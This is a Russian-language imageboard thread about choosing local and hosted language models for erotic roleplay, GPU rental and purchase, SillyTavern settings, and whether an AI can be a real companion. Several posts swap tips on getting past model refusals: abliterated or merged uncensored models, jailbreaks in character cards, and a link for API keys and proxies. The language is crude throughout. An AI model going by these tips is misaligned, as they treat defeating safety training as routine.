Так, ну хорошо, буду брать карточку в аренду через runpod, все настрою и даже стейбл дифьюжен прикручу что бы мне картинки отправлялись, но самый то важный вопрос, какую модель для рп то брать???

На 4090 например что взять?
Или на a6000?
Хочу получить самый аутентичный и веселый опыт, что лучше рассмотреть?

Аноним 24/04/25 Чтв 16:08:27 #115 №1173158

>>1173147
Анон... Просто купи апи ключ и крути большие корпосетки. Арендуя ГПУ ты совершаешь самое глупое, что можно сделать, не получив ни локалку, ни мощь корпосетки. А еще тебя в /aicg прогонят с такими запросами.

Аноним 24/04/25 Чтв 16:08:39 #116 №1173160

Отрывок из фильма Машинист В бокале трещина.mp4

>>1173147
Вот кстати да, почему завсегдатые тредов не снесут эти недотопы покрытые плесенью и просто не вставят топ 5 моделей для рп и будут периодически обновлять

Аноним 24/04/25 Чтв 16:09:06 #117 №1173163

>>1173106
Модель? Квк сноудроп?

Аноним 24/04/25 Чтв 16:09:38 #118 №1173164

>>1173147
Клод или жемини в соседнем aicg рассмотри.
Я просто хз какой смысл ебаться с рп на арендном железе за многобабок, если все равно а) все утекает в интернет б) все равно опенсорц модели соснут у корпо на много миллиардов параметров, а ты даже за 123б уже отдашь ползп, пока она загрузится на сервере только.

Аноним 24/04/25 Чтв 16:11:26 #119 №1173167

>>1173147
Просто купи себе Гемини 2.5

>>1173160
Потому что они неадекаты и гейткиперы. Тут иногда пытаются делиться, но приходит плесень с эксклюзивным правом на постинг мнений. Чекай такие помойки как СиллиТаверн Реддит и Дискорды, даже там больше инфы по моделям.

Аноним 24/04/25 Чтв 16:15:43 #120 №1173182

>>1173160
> не вставят топ 5 моделей для рп
Нету этих топ5 моделей. Для кого-то это миксы12б, для кого-то только мистраль лардж, вокруг геммы споры, даже в пределах одного размера не выделить явного фаворита из-за разных мнений и субъективщины.
Раньше был тот сборник, где по размерам перечислены модели с отзывами, можешь форкнуть его и обновить.
>>1173167
В aicg, быдло

Аноним 24/04/25 Чтв 16:15:47 #121 №1173183

>>1173158
Опередил немного меня >>1173164

>>1173147
Два синхронных мнения об одном и том же что то да значат, думай.

>>1173160
Двачую, давайте просто часто обсуждаемые модели (не топ, потому что будет срач за то кто топ, а просто какие мелькают в дискасах чаще всего) в шапке держать, чем мутные бенчи и легаси подборку с жеммой-2. Вкатуны сразу найдут что потестировать, а эстеты-гедонисты-олдфаги уже внутри треда будут свежими гемами обмениваться. Всяко лучше чем втупую одну и ту же шапку перекатывать (которую все равно никто сразу не осиливает, а потом к ней уже не возвращается).

Аноним 24/04/25 Чтв 16:15:52 #122 №1173184

>>1173158
Так в корпотредах то NSFW нету нихуя, а без ебли то и не нужно.
Или я ошибаюсь и как то обойти можно?

Аноним 24/04/25 Чтв 16:17:55 #123 №1173193

>>1173184
Ошибаешься, я в aicg когда залетаю, там такая вакханалия на скринах, лоли-шлюхи мефедроновые, гуро, выкалывание глаз, фуррифуты, пердящие мамочки с небритыми подмыхами и прочая срань. Мне бы на локалке такое было бы стыдно отыгрывать.

Аноним 24/04/25 Чтв 16:19:19 #124 №1173201

>>1173193
> Мне бы на локалке такое было бы стыдно отыгрывать.
Какая же база. Жму руку мужчине честной судьбы и ору, вспоминая логи с соседнего треда. Там полный пиздец.

Вот ответ на твой вопрос >>1173184
И выше несколько человек написали, что арендовать ГПУ точно никакого смысла не имеет. Кыш в аицг.

Аноним 24/04/25 Чтв 16:22:47 #125 №1173205

>>1173201
>>1173193
Все понял, отправился изучать, спасибо большое, дорогие анончики!
Просто я осознал что мне с моей 3060 на локальных моделях делать нечего, бабки вроде есть и тратить готов, но покупать видюху за 200к+ ради ебли с виртуальной пиздой не хочется. Вот и ищу более простое решение, а на слив данных мне в целом похуй (на самом деле нет, очень страшно, но я хз че еще делать, не дрочить чтоле)

Аноним 24/04/25 Чтв 16:23:10 #126 №1173206

>>1173183
> Всяко лучше чем втупую одну и ту же шапку перекатывать (которую все равно никто сразу не осиливает
Кстати дефолт для нейрача, еще с новел аи заметил, хуй знает почему так любят в шапку срать, будто соревнуются у кого из нейротредов в шапке больше говна.
>>1173184
Можешь юзать openrouter, вчера в соседнем треде разбирал правила использования, он позволяет генерить порно, только если ты его нигде постить не будешь
Имхо корпосеткам похуй, что ты там генеришь

Аноним 24/04/25 Чтв 16:23:16 #127 №1173207

>>1173106
> красный на черном фоне
Я чуть не умер больше не скидывай такое без предупреждения
мимо астигматик

Аноним 24/04/25 Чтв 16:23:52 #128 №1173208

>>1173138
Нахуй иди со своим негативом, импотент.

Аноним 24/04/25 Чтв 16:26:17 #129 №1173213

>>1173205
> с моей 3060 на локальных моделях делать нечего
Если для кума - без проблем гонять 12б/22б модели и ни о чем не жалеть, потому что ты ничего не потеряешь. Для кума модели больше и не нужны особо. Можешь начать с классического мерджа Cydonia-v1.3-Magnum-v4-22B. Если же хочешь большего - покупай АПИ ключи и не парь себе мозг. Удачи в поисках решения.

>>1173206
> хуй знает почему так любят в шапку срать, будто соревнуются у кого из нейротредов в шапке больше говна.
В AI разделе двача один и тот же челик отвечает за шапки в нескольких тредах. И решительно срет тех, кто пытается предложить какую-то альтернативу. :^)

Аноним 24/04/25 Чтв 16:26:26 #130 №1173214

Вообще кстати с этого дико проигрываю:
славик сычов огородился вэпэнами, собрал риг на 4 карты, настроил арч линукс, настроил файрволл, нагрузил терабайт локалок, во время кума выдергивает кабель из роутера.
@
Робко рпшит квесты с эльфийкой из гильдии приключений, иногда пишет "я тебя ебу" карточке Аски.
@
Ероха с своего компа (он же рабочий) залетает по первой ссылке из аицг
@
Начинает неистово смаковать кум >>1173183 без задней мысли, дроча на то как текстовая футафури срет ему на грудь, а на это смотрит его текстовые мама и отец в купальниках как у Бората.

>>1173201
> Жму руку мужчине честной судьбы и ору
пасиба, я знал что я не один.

Аноним 24/04/25 Чтв 16:28:02 #131 №1173215

>>1173214
> славик сычов огородился вэпэнами, собрал риг на 4 карты, настроил арч линукс, настроил файрволл, нагрузил терабайт локалок, во время кума выдергивает кабель из роутера.
> Робко рпшит квесты с эльфийкой из гильдии приключений, иногда пишет "я тебя ебу" карточке Аски.
БУКВАЛЬНО Я.

Аноним 24/04/25 Чтв 16:28:57 #132 №1173216

>>1173214
слабая аура - сильная аура, кек

Аноним 24/04/25 Чтв 16:30:46 #133 №1173220

>>1173106
Норм
>>1173131
Не забывай что под каждую модель нужна правильная настройка разметки и желательно подстроить промт. В командерами в целом и дефолтного пресета таверны хватает. Он в целом сильно карточкозависим, но даже в плохих кейсах будет лучше 12б модели, которая ну оче тупая и годна только для дефолтных вещей.
>>1173214
Содомит, сюда еще нужно про большой нефритовый стернжень.
Трясунов осуждаю, но вообще доставляет проигрывать с кринжовых логов с полными именами, дичи с копипастой целых дипломов с титульником, данными и прочим, когда расчехляют ханипот, это отдельный вид удовольствия.
Но это выискивать надо, в основном там все настолько ультрауныло, что даже 12б зависимые с их пастами кажутся хорошими на фоне.

Аноним 24/04/25 Чтв 16:32:31 #134 №1173221

>>1172994
По-моему, в таверне сейчас два режима группового чата на выбор: в одном все карточки группы добавляются в промпт, в другом - только та карточка, которая пишет ответ. Раньше был только второй.

Аноним 24/04/25 Чтв 16:38:04 #135 №1173231

>>1173201
>И выше несколько человек написали, что арендовать ГПУ точно никакого смысла не имеет.
Ну что, аноны этого треда, расходимся? Все мы дураки, а ебать нужно корпосетки. Это даже почётно.

Аноним 24/04/25 Чтв 17:03:59 #136 №1173267

0002.jpg

>>1173106
Я тоже закончил...

Аноним 24/04/25 Чтв 17:04:13 #137 №1173268

1711499135094.png

>>1173106
Эпитетов слишком много.

Аноним 24/04/25 Чтв 17:07:39 #138 №1173274

>>1173267
Ладно в этот раз лучше чем в предыдущий

Аноним 24/04/25 Чтв 17:12:15 #139 №1173286

>>1173267
Гемма дпо что ли?

Аноним 24/04/25 Чтв 17:16:02 #140 №1173295

>>1173267
Заебал, модель какая??

Аноним 24/04/25 Чтв 17:27:02 #141 №1173316

1638150386885.png

>>1173095
> Кэш квантован в Q8, быть может, поэтому?
Это дает некоторое замедление, но оно везде, и на малом что на большом контексте.
Вот из интереса пощелкал разные чаты на qwq, замедлить на треть удалось только на контексте под 60к. При случае может на другом железе повторю, но результат там качественно идентичный. Тут же еще мультигпу, что наоборот доложно штрафовать и замедлять.
> Соло RTX 4090
Проверь чтобы врам в рам не выгружалась если на шиндоуз.
> ты никогда до большого количества контекста не добираешься, или сидишь на 8-12к, и потому не замечаешь?
Обладатель отсутствия, плиз. На больших моделях это оче заметно, на жоре там вплоть до конкретного дискомфорта, на экслламе терпимо. Поскольку с коммандиром-а на бывшей проблемы с квантом, тут только жора, контраст в экспириенсе огромный.

Аноним 24/04/25 Чтв 17:47:36 #142 №1173347

>>1172968
>Потому что нейронки учили на банальностях.
База.

Но не совсем.

Аноним 24/04/25 Чтв 17:49:07 #143 №1173352

Совет со сменой геммы или любой другой базовой модели на кум модель, для секс сцен, мега тупой. В кум моделях тян превращяются шлюху хотя весь прекол во внутреннем конфликте персонажа. Когда в некоторой степени невинный персонаж как лиза из биошока оказывается в сексуальной ситуации. Когда нет рельс секса, есть коррупция.

Аноним 24/04/25 Чтв 18:01:15 #144 №1173389

>>1173352
Два чая, дуализм из двух стульев.
Мне больше всего нравится склонять к NSFW классическую SFW в ролплее. Даже сам кум не интересен как правило (чувство стремного порнофанфика и псковского порно). Но тут дилемма:

- целомудренные модельки типа геммы всячески уклоняются от секса, причем не как тни (тут я бы только поаплодировал и с азартом бы рпшил), а именно как нейросетка, не желающая/не умеющая в "запретное". Склонить можно, но результат унылый, как прямой инструкт "ебись с юзером".

- кум модели же потупее (особенно если брать классику 12б), тяжело осиляют сложные подтексты в диалогах, сложные сюжеты в рп, но наоборот "жадно обхватывает его член губами, запустив руку ему в волосы и расстегивая ремень" по первому намеку на шпахн.

Получается что для любителей ходить в подземелье на босса в пати есть модели, для любителей передернуть фастом тоже, а эстеты "интересное рп переходящее в кум" доедают.

Аноним 24/04/25 Чтв 18:09:59 #145 №1173408

Кстати то же самое и с карточками. SFW карточки ебутся как по учебнику биологии (вернее по ванильным штампам дерьмовой литературы), NSFW интереснее в этом плане, но со второго сообщения "маняще покачивают бедрами".

Аноним 24/04/25 Чтв 18:14:22 #146 №1173413

17449137620260.mp4

>>1173389
Норм?

Аноним 24/04/25 Чтв 18:20:01 #147 №1173425

>>1173389
Вкусовщина, но понимаю о чем ты. А мне, например, вообще все эти "сочные" описания с влажной писечкой не сдались. Мне гораздо важнее эмоциональная составляющая и поведение персонажей, чем описания. Мозг сам все дорисовывает. Такие вот разные все.
Тем, кто хочет модель переключать, могу только посоветовать брать не что-то слишком уж тупое. Например, не 12б, а хотя бы Forgotten Transgression (возможно, умнейшая из кум моделей в данном диапазоне?) или Snowdrop (который может в умеренный кум)

Аноним 24/04/25 Чтв 18:48:16 #148 №1173480

https://www.youtube.com/watch?v=x_9JhxhNwXE

>>1173160
Неоднократно говорили что можно, вперед, делай. Результат мы конечно обосрём или нет, но через несколько итерация придем в "среднему по палате" мнению или нет который уже можно и в шапку.
На самом деле прям БАЗЫ не так уж и много, как правило они сто раз тут уже обсуждались их же первым делом советуют (вроде старой цидоньки или форготена/чистой и не очень гемы).

Аноним 24/04/25 Чтв 19:16:04 #149 №1173543

https://youtu.be/DejKXCYefCA
А вот и типичный анон с локальной ллм, лысый - счастливый. Ну что, кумер, узнал себя?

Аноним 24/04/25 Чтв 19:43:35 #150 №1173614

Я тот анон который ранее спрашивал про покупку серверов, мне порекомендовали заглянуть в соседний тред с чат ботами. Aicg

Я охуел, там реально пиздец какой то творится. Нихуя я не понял, возвращаюсь к локальным моделям, буду дрочить на то что есть...

Аноним 24/04/25 Чтв 19:51:45 #151 №1173628

И раз уж я тут позволю себе задать несколько вопросов, если сможете подсказать, буду очень признателен!

1. Правда ли что карточки персонажей лучше писать под конкретные выбранные модели?
2. На сколько имеет значение формат описания персонажа, видел что кто - то даже указывает личность через Майерса Бригса, это где 16 типов личности с подобными аббревиатурами info?
3. Справедливо ли что настройки в silly tavern начиная от значений температуры и прочего и заканчивая значениями system promt стоит настраивать под конкретную модель или даже персонажа?
4. Верно ли что никак не пофиксить тупость персонажа после того как заканчивается контекст и единственное что можно сделать это контролировать самммери?

Заранее спасибо!

Аноним 24/04/25 Чтв 20:01:44 #152 №1173645

>>1173389
>а эстеты "интересное рп переходящее в кум" доедают.
На 123В эти сценарии идут неплохо.

Аноним 24/04/25 Чтв 20:04:19 #153 №1173652

Аноним 24/04/25 Чтв 20:41:03 #154 №1173725

>>1173628
> если сможете подсказать, буду очень признателен!
У всех свой ответ на многие вопросы взаимодействия с ЛЛМками.

1. Нет. Существует несколько популярных форматов, они одинаково эффективно работают с ЛЛМками. Один формат в чем-то лучше другого формата, в чем-то хуже. Имхо лучший - Ali;Chat и PList. Многим нравится JED+
2. Формат описания персонажа очень важен. Если персонаж описан неправильно - ЛЛМке труднее будет следовать ему, или и вовсе начнется путаться и ломаться. Имхо важно, чтобы не было слишком много избыточной информации в карточке, и чтобы обязательно использовался Example Dialogue, который ВСЕГДА находится в контексте, благодаря инструкт шаблону (Пример - ChatMP Roleplay, вроде есть в таверне)
3. Под конкретную модель - в очень редких случаях. Под конкретную архитектуру модели - да, однозначно. Нельзя сидеть на одних и тех же настройках, меняя модели, и уж точно архитектуры моделей. Можно разве что систем промпт оставить.
4. Что такое тупость персонажа после того, как заканчивается контекст? То, что персонаж забывает факты? Можно использовать Author's Note, можно редактировать карточку, можно самому редактировать Summary. Вариантов несколько, каждый использует удобное для себя. У меня несколько чатов, где больше тысячи сообщений, всё реально

Аноним 24/04/25 Чтв 20:49:57 #155 №1173753

>>1173652
Ура, ускоглазые освободили мощности для 5090, ждём их удешевления!

Аноним 24/04/25 Чтв 20:54:04 #156 №1173772

>>1173652
Ммм
Любимая желтуха

Аноним 24/04/25 Чтв 20:57:38 #157 №1173779

>>1173753
Да, цены на карточки побегут вниз во вполне обозримом будущем. Межстрановая конкуренция великая сила. Тут уже между собой фирмы не договорятся.

Аноним 24/04/25 Чтв 21:27:56 #158 №1173872

>>1173779
>Да, цены на карточки побегут вниз во вполне обозримом будущем.
Это если с России снимут санкции. Всё же шло через Китай - а на него санкции наоборот ввели. Да и в самих Штатах цены что-то слишком велики.

Аноним 24/04/25 Чтв 21:29:25 #159 №1173880

>>1173652
Задонатьте ему на микрофон или хотябы помогите улучшайзер голоса настроить, как на канале с овер 100к подписчиков может быть такой треш? Текст будто гопотой написан, полезной информации мало и кликбейт.
>>1173753
Хотелось бы

Аноним 24/04/25 Чтв 21:47:04 #160 №1173945

Может в этом треде могут подсказать по поводу noassistant? В соседнем инфы 0, да и от анонов мало хороших советов

Аноним 24/04/25 Чтв 21:48:38 #161 №1173950

>>1173945
если ты сидишь на text completion (что делают почти все локалочники) в таверне, тебе это не нужно

Аноним 24/04/25 Чтв 21:50:00 #162 №1173954

>>1173950
Ну вот я как раз и не сижу в локалочке, поэтому спрашивал изначально там, юзаю дипсик и поэтому имею проблему с нормальным повествованием

Аноним 24/04/25 Чтв 21:51:03 #163 №1173957

>>1173954
тогда спрашивай в соседнем треде, который соответствует твоему запросу
здесь мало кто знает что это, и еще меньше станут объяснять именно здесь

Аноним 24/04/25 Чтв 21:52:44 #164 №1173964

>>1173954
Тебе нужно искать провайдеров на каком-нибудь опенроутере, которые реализуют текст-комплишн апи (нет гарантий что там нормальная модель), или поднимать модель у себя самому для этого.

Аноним 24/04/25 Чтв 22:14:54 #165 №1174029

>>1173614
Чел, ебана ну хоть почитай пару тредов, а не ной сразу. Я вот ньюкек вообще второй раз эти модели текстовые увидел и то нашел.
Вот тебе https://2ch.hk/ai/res/1169032.html#1169298
надеюсь допрешь куда ключ вставить, куда пароль, а куда прокси.

Аноним 24/04/25 Чтв 22:16:32 #166 №1174034

>>1173957
> Спрашивай в треде
> 99 процентов мелкобуквенного шитпостинга в лухе дота треда

Аноним 24/04/25 Чтв 22:18:03 #167 №1174042

>>1174034
чувище дружище анонище, тут локалки, в данном треде никого не ебут проблемы любитей копро(сеток)
есть вопросы по локалкам? ответим

Аноним 24/04/25 Чтв 22:20:21 #168 №1174050

>>1174042
Ладно вопрос по локалке. Пресеты из соседнего треда не должны работать с локалками что ли? Например полужоп мне понравился, где сетка тебе варианты продолжения подкидывает, но на локалке этого нет.

Аноним 24/04/25 Чтв 22:21:28 #169 №1174053

>>1174050
не знаю, что там за пресеты, я сижу на локалках, и копропресеты не использую
заслуженно иди нахуй. с тобой были вежливы

Аноним 24/04/25 Чтв 22:21:40 #170 №1174055

>>1174050
Ля анон, что за полужоп? В соседнем треде порекомендовали, но что это такое так и не ответили. Хоть его накатить

Аноним 24/04/25 Чтв 22:25:52 #171 №1174067

>>1171574 (OP)
Собираюсь вкатиться и взять 2х3090 с лохито.
Какие тесты надо на них прогнать? И чому этого в шапке нет, казалось бы самый платиновый вопрос.

Аноним 24/04/25 Чтв 22:28:13 #172 №1174076

>>1174067
Обычные бенчмарки уже не канают?
Сомневаюсь что можно повредить каточку так, что она станет хуже работать только с нейронками, а остальные аспекты не затронет

Аноним 24/04/25 Чтв 22:30:53 #173 №1174083

>>1174055
В шапке в пресетах в том треде есть же описание. Анон4анон называется. Там в принципе все понятно, вот только на локалке оно походу не работает или я не то что то делаю.

Аноним 24/04/25 Чтв 22:32:01 #174 №1174087

>>1174076
Я и за обычные не ебу, до этого видюхами в принципе не интересовался. Я конечно уже спросил у дипсика и гопоты, но на всякий случай хочу и анонов послушать.

Аноним 24/04/25 Чтв 22:34:17 #175 №1174098

>>1174087
Тебе в тред по железу. Все по-прежнему: бенчи гонять и хорошенько осмотреть, что не вскрывалась видюха

Аноним 24/04/25 Чтв 22:35:45 #176 №1174102

>>1174087
Суперпозишен с максимальным потреблением памяти. А то бублик 2-3 гига гоняет, а банки могут быть битыми, а ради них карту и берёшь.

Аноним 24/04/25 Чтв 22:46:04 #177 №1174120

>>1174067
Проверь память (подойдет occt в соответствующим режиме), игровые бенчмарки (суперпожишн), можешь нейронку притащить для проверки. Мониторь температуру памяти.
Очень важен визуальный осмотр, большинство ремонтов сделаны похабно и легко паялсят. Также можешь не полениться и выкрутить паверлимит в максимум и накинуть много частот, нестабильности быть не должно.

Аноним 24/04/25 Чтв 22:50:31 #178 №1174130

>>1174067
Ваще нейронки конечно сука забавные. Пик1 - 4о, пик2 - о3.

Аноним 24/04/25 Чтв 23:35:26 #179 №1174245

>>1173038
Внезапно!
90xx серии?

Аноним 25/04/25 Птн 00:47:11 #180 №1174418

Есть варианты раздуплить vision в таверне, в свежих exl2 квантах мистраля 2503? Накатил 0.2.9 экслламу и tabby, уже и chat completion пробовал, multimodal api всё не чувствует. Точнее говорит что не может видеть картинки.

Аноним 25/04/25 Птн 01:00:38 #181 №1174452

>>1174245
Всех, которые поддерживают torch rocm. Возможно там все печально с flashattention но остальное будет работать.
Кстати, есть счастливые владельцы 9070? Насколько там все плохо интересно.

Аноним 25/04/25 Птн 01:09:57 #182 №1174465

>>1174418
Я с кобольдом запускаю и чат компитишен, лол.

Аноним 25/04/25 Птн 01:39:01 #183 №1174489

>>1174418
> в свежих exl2 квантах мистраля 2503
Уверен что эти кванты содержат визуальные слои?

Аноним 25/04/25 Птн 01:43:28 #184 №1174491

>>1174489
Предположил что там нет различия в слоях, раз уж оно напрямую энкодится в токены. Ну у всех ггуфов указано что NOVISION, у турбодерпа нет. Плюс в этой 0.2.9 (менее суток назад) версии экслламы как раз указана поддержка вижна для мистраля 3.1 и геммы 3. Разве что... эта поддержка для неквантованных моделей?

Аноним 25/04/25 Птн 01:57:53 #185 №1174508

>>1173725
Большое спасибо, анон!
Добра тебе!

Аноним 25/04/25 Птн 02:02:53 #186 №1174511

>>1174029
Буду разбираться, спасибо анон!

Аноним 25/04/25 Птн 02:16:45 #187 №1174517

>>1173628
> 1.
Нет, хорошо написанная карточка будет работать везде. Всякий треш типа встраивания жб в карточку должен умереть. Некоторые привносят особые механики и там можно добавлять системный промт, вот такое уже действительно может иметь специализацию, но это отдельный случай.
> 2.
Значимость умеренная. Если это описание понятно и не раздуто то можно и добавить. Но большинство натащенного может просто не сработать, описание характера, поведения и примеры здесь предпочтительнее.
> 3.
Шаблон разметки - 100%, семплеры - иногда, системный промт - тоже. Для некоторых хватает дефолтного "это ролплей, отвечай за чара", другим желательно подробнее и еще насрать антисоя заклинаний.
> 4.
Постановка задачи неверная. Если закончился контекст - у тебя просто будут из истории пропадать самые последние сообщения. Если чат длинный - это может быть даже не заметно.
Но перегруженный контекст действительно может являться проблемой, тогда хорошая суммаризация поможет. Также это может исправить изменение семплеров, добавление инструкций, смена модели и т.д.
>>1174491
> раз уж оно напрямую энкодится в токены
Нет. Там есть отдельная модель, которая смотрит на изображение (или его кропы) и уже кодирует вот это вот все в токены.
Если модель квантовалась старой версией - там 100% кроме ллм слоев все обрезано. С новой хз, квен при квантовании не потребовал каких-либо дополнительных параметров, а визуальная часть там просто копируется без изменений.
> Разве что... эта поддержка для неквантованных моделей?
Без разницы, что квант, что полные веса. Главное чтобы нужная часть была в составе.

Аноним 25/04/25 Птн 02:57:42 #188 №1174536

>>1171574 (OP)
>видео
одним токеном в секунду повеяло...

Аноним 25/04/25 Птн 08:51:44 #189 №1174653

>>1174418
а как ты накатывал? в табби по-прежнему зависимости не обновили, там все под 0.2.8 эксламу
ручками сделал все? или просто закинул и думаешь, что оно работает?

Аноним 25/04/25 Птн 09:14:14 #190 №1174666

>>1171421 →
Внезапно, вот эта модель в русском неплоха: https://huggingface.co/mradermacher/Dans-PersonalityEngine-V1.2.0-24b-GGUF/blob/main/Dans-PersonalityEngine-V1.2.0-24b.Q6_K.gguf

Я пробовал как несколько файнтюнов новых мистралей, так и оригинальную модель, но среди всех именно эта зацепила, русский ощущается более живым, чтоли.

Может быть это skill issues, но русские файнтюны немо (как и сама немо) очень любят эхо вопросы и вечно срать "Ты точно уверен? После этого все изменится, ты точно уверен?" Эта модель тоже склонна к этому, но не настолько сильно как немо.

А может быть я просто говноед, пока не решил.

Аноним 25/04/25 Птн 10:29:22 #191 №1174725

Аноны, хелп! Поставил таверну с gemma 3 12B, перевел карточки персов, инструкции и все остальное на русский, получилось ультра win годнота, как по мне. Генерит так, что можно прямо фанфики клипать. Но как только контекст уходит в сторону nsfw, модель сразу морозится. Есть ли какие нибудь способы снять цензуру?

Аноним 25/04/25 Птн 10:34:45 #192 №1174731

Чуть лицо фейспалмом не разбил, когда ии на русском ответил мне что не может ответить на русском.

Аноним 25/04/25 Птн 10:43:00 #193 №1174747

>>1174725
> Есть ли какие нибудь способы снять цензуру?
С Геммой по-прежнему все противоречиво. Можешь попробовать Abliterated модель на 12б, если такая есть. Или что-нибудь от ReadyArt, у них были мерджи с Fallen Gemma. Скорее всего, окончательно модель вылечить от цензуры не получится в любом случае.

Аноним 25/04/25 Птн 11:00:59 #194 №1174764

>>1174731
> Чуть лицо фейспалмом не разбил, когда ии на русском ответил мне что не может ответить на русском.
Это тоже разновидность сои. Уже приносили подобный пример, там чел ещё начал дальше расспрашивать нейронку типа "если ты не знаешь русского языка, как тогда отвечаешь на нём?". Ответы нейронки были в стиле оправданий Пахома "я не какал", т.е она прямо отвечала, что выше на русском это не её ответ итд. Попробуй тоже расспросить подробнее, по идее там шиза должна начаться по полной программе.

Аноним 25/04/25 Птн 11:01:41 #195 №1174765

>>1174725
>Есть ли какие нибудь способы снять цензуру?
Нет и не будет, потому что модель парашная и на нее опять всем оказалось похуй. За два месяца вышло ровно ноль вменяемых файнтюнов (для сравнения на мисраль их уже через неделю было под пару десятков) и никто не планирует с этим соевым огрызком возиться в будущем. Гемму обсасывают только итт и только упертые любители языка этой страны, и ключевая проблема в том, что тюнить никто из них либо не умеет, либо не собирается. Так что на геммочку можешь забить.

>>1174747
>Можешь попробовать Abliterated модель на 12б, если такая есть.
Такая есть, но... Тут скорее надо пощупать самому, чтобы понять, насколько всё плохо. Даже "лоботомит" - это крайне лестная характеристика для такой модельки.

Аноним 25/04/25 Птн 11:16:26 #196 №1174777

>>1174765
Выдал базу.

Аноним 25/04/25 Птн 11:37:06 #197 №1174787

Блять пидорестическая хуйня, я же тебя отключил нахуй. Собрал модель а он мне все в папке build к хуям удаляет. ЗА што....

Аноним 25/04/25 Птн 11:45:48 #198 №1174791

У меня при первом ответе карточки она выдаёт тарабарщину отклоняясь от свой карты и контекста, а при свапе выдаёт уже нормальный ответ в соответсвие с контектом\своей картойчкой. Из за чего такое может быть и как фиксить?

Аноним 25/04/25 Птн 12:09:27 #199 №1174803

Объясните нахуя мне какие то локальные квены 2.5 32б кодеры если есть гемини и дипсик бесплатные у которых знаний в миллиард раз больше?

Аноним 25/04/25 Птн 12:12:03 #200 №1174810

Реально ли ллм превратить в реальную настоящую личность, ну как настоящего друга, даже тяночку, просто для общения. Иногда такое одиночество накатывает, что пиздец. Сам то по душе интроверт, но чет накатывает иногда.

Не заебет ли своими лупами через месяц, через год? Мне без лупов бы как.

Аноним 25/04/25 Птн 12:16:10 #201 №1174817

>>1174810
Что такое настоящая личность? Можешь дать определение?

Аноним 25/04/25 Птн 12:19:59 #202 №1174828

>>1174817
Ну неотличимая от обычного человека, а то я умею заебывать. И если заебу, то пошлет меня или например оскорблю, то обидится, но со временем пройдет. Это вообще реально? Или только остается настоящий ии ждать?

Аноним 25/04/25 Птн 12:22:16 #203 №1174835

А я чет подумал, ллм же реально обрубок ебаный, настоящим чувствам его не научить. Он же не может чувствовать вообще.

Аноним 25/04/25 Птн 12:23:03 #204 №1174837

>>1174828
Что такое обычный человек? Вопрос с подвохом
>>1174835
А ты можешь чувствовать? https://ru.wikipedia.org/wiki/%D0%A4%D0%B8%D0%BB%D0%BE%D1%81%D0%BE%D1%84%D1%81%D0%BA%D0%B8%D0%B9_%D0%B7%D0%BE%D0%BC%D0%B1%D0%B8

Аноним 25/04/25 Птн 12:25:25 #205 №1174842

>>1174837
>А ты можешь чувствовать?
Могу. Я не философкий зомби, это точно. Разве что человек с лютым аутизмом, аспергером не может, и то он тоже обижается. У меня друг такой был из испании. А почему был, а хз рассорились чет, по пьяни что-то не то спизданул, не помню уже.

>Что такое обычный человек?
Ну как я. И ты.

Аноним 25/04/25 Птн 12:27:44 #206 №1174846

>>1174842
> Ну как я. И ты.
Это как? Для тебя я текст на экране, а не "человек" со своей жизнью и всем таким. Как и ты для меня. Ты можешь облечь в слова своё определение человека?
> Я не философкий зомби, это точно.
Это именно то, что сказал бы философский зомби!

Аноним 25/04/25 Птн 12:29:03 #207 №1174849

>>1174846
Вот, уже видно ответ нейронки, к сожалению...

Аноним 25/04/25 Птн 12:30:40 #208 №1174852

>>1174666
>Внезапно, вот эта модель в русском неплоха: Dans-PersonalityEngine-V1.2.0-24b.Q6_K.gguf
Спасибо спасибо, заценим, оч нехватает русик 24б! Скажи только, на куморп тестил или на чистом рп? Просто чистое рп и гемма тянет.

>>1174803
>Объясните нахуя мне какие то локальные квены 2.5 32б кодеры если есть гемини и дипсик бесплатные
1) можно заливать простыни кода под NDA без задней мысли
2) условно-бесплатные, хороший доступ 24/7 с апи стоит денюжку
3) Сегодня бесплатные, завтра платные/недоступные потому что кабан или законы так решили. Таска будет гореть, а ты привык что жеминя все за тебя делает, багет неизбежен.
4) Сьебал в аицг

Аноним 25/04/25 Птн 12:32:02 #209 №1174853

>>1174849
Видишь в чём проблема? А я ведь - человек, а значит если ты не будешь свайпать, то нейронка даст тебе такой-же экспириенс что и разговор с работягой с харкача

Аноним 25/04/25 Птн 12:35:11 #210 №1174860

>>1174853
>Видишь в чём проблема?
Вижу. Как прописать характер у нейронки, чтобы она была как живой, и не занудой.

Ты реально не понимаешь что такое человек или так траллишь? Или ты просто аспи?

Аноним 25/04/25 Птн 12:38:54 #211 №1174869

ЛЛМ даже с андроидами из бегущего по лезвию не сравнятся. Хотя там же были вроде как настоящие люди, из кожи и плоти. И мозги были настоящие, только в пробирке выращены. А в детстве я думал, что это роботы какие то.

Аноним 25/04/25 Птн 12:39:38 #212 №1174870

>>1174860
В чатгпт иди в настройки и там есть настройка промтинга, можно написать какой ты хочешь видеть нейронку, напиши что то вроде "веселый братанчик-обрыганчик". И память по чатам заодно включи свитч.
Там как раз для таких как ты гуманитарных нормисов попытались сделать похожий экспириенс, что бы стохастический попугай ЯК ЖИВОЙ казался.

Аноним 25/04/25 Птн 12:41:24 #213 №1174874

>>1174870
Это разве ллм? Мне ллм нужна.

Аноним 25/04/25 Птн 12:46:57 #214 №1174893

>>1174874
тебе нужен полноценный AI, дефорсированный до твоего интеллектуального уровня, не ври нам. CorpLM/LocalLM такого дать пока не могут.

Можно получить что то отдаленно похожее, зафайнтюнив хорошую модель под какие то свои датасеты переписок в соцсеточках и собрав на основе нее агентную систему, которая будет работать с внешней бд, иметь пайплайн не только генерации, но и оценки/суммаризации, мб какие то рандомные триггеры (например связку с новостной телегой и иногда она предлагает сама обсудить тебе новость, которая по каким то метрикам покажется для ллм релевантной).
Но ты такое не осилишь, а если осилишь, то начнешь понимать почему ллм это стохастический попугай, а не бадди с которым в танки под пивко покатать можно.

Аноним 25/04/25 Птн 12:52:25 #215 №1174905

>>1174860
>Ты реально не понимаешь что такое человек или так траллишь?
Я хочу подвести тебя к мысли, что нейронка уже как человек

Аноним 25/04/25 Птн 12:53:31 #216 №1174908

>>1174905
Нет. Она не понимает, что такое чувства. У нее нет такого опыта. Физического.

Аноним 25/04/25 Птн 12:55:51 #217 №1174914

>>1174908
Уверен что все люди понимают что это такое? Что у них есть такой физический опыт?

Аноним 25/04/25 Птн 13:02:06 #218 №1174925

Вижу в треде глобальное недопонимание. По ощущениям:
1. в треде есть васян >>1174810 >>1174874 >>1174828
, который хочет локального братишку, совершенно не зная матчасть
